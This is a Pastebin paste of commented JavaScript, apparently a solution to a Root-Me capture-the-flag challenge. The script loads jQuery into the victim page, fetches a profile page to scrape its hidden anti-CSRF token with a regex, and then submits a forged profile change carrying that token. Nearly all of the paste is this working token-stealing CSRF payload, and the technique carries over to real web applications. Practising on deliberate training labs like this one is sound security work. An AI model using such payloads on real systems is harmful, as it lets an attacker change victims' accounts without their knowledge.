Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- // Load JQuery dynamically in the targeted context
- var headx = document.getElementsByTagName('head')[0];
- var jq = document.createElement('script');
- jq.type = 'text/javascript';
- jq.src = 'http://code.jquery.com/jquery-latest.min.js';
- headx.appendChild(jq);
- // Function with JQuery AJAX request
- // This function requests an internal WebGUI page, which contains the token.
- // Source code of this webpage is passed to the extractToken() function.
- function loadToken(){
- $.ajax({
- type: 'POST',
- url: 'http://challenge01.root-me.org/web-client/ch23/?action=profile',
- contentType: 'application/x-www-form-urlencoded;charset=utf-8',
- dataType: 'text',
- data: '',
- success:extractToken
- }); // after this request, we called the extractToken() function to extract the token
- }
- // Function called after AJAX request in a defined page of the context, which contains the token value
- function extractToken(response){
- // response var contain the source code of the page requested by AJAX
- // Regex to catch the token value
- var regex = new RegExp("<input type='hidden' name='token' value='(.*)' />",'gi');
- var token = response.match(regex);
- token = RegExp.$1;
- // Pass the token to the final function which make the CSRF final attack
- makeCSRF(token);
- }
- // This function use JQuery AJAX object.
- // The token var is needed to perform the right CSRF attack with the context referer
- function makeCSRF(token){
- // Final CSRF attack with right referer (because executed in the context)
- // and with right token captured above
- $.ajax({
- type: 'POST',
- url: 'http://challenge01.root-me.org/web-client/ch23/?action=profile',
- contentType: 'application/x-www-form-urlencoded;charset=utf-8',
- dataType: 'text',
- data: 'submit=Submit&username=lol&status=checked&token=' + token
- }); // payload of your choice
- }
- // Waiting 2 secondes for correct loading of JQuery added dynamically.
- // Then, run the first AJAX request in the WebGUI context to retrieve the token
- setTimeout('loadToken()', 2000);
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement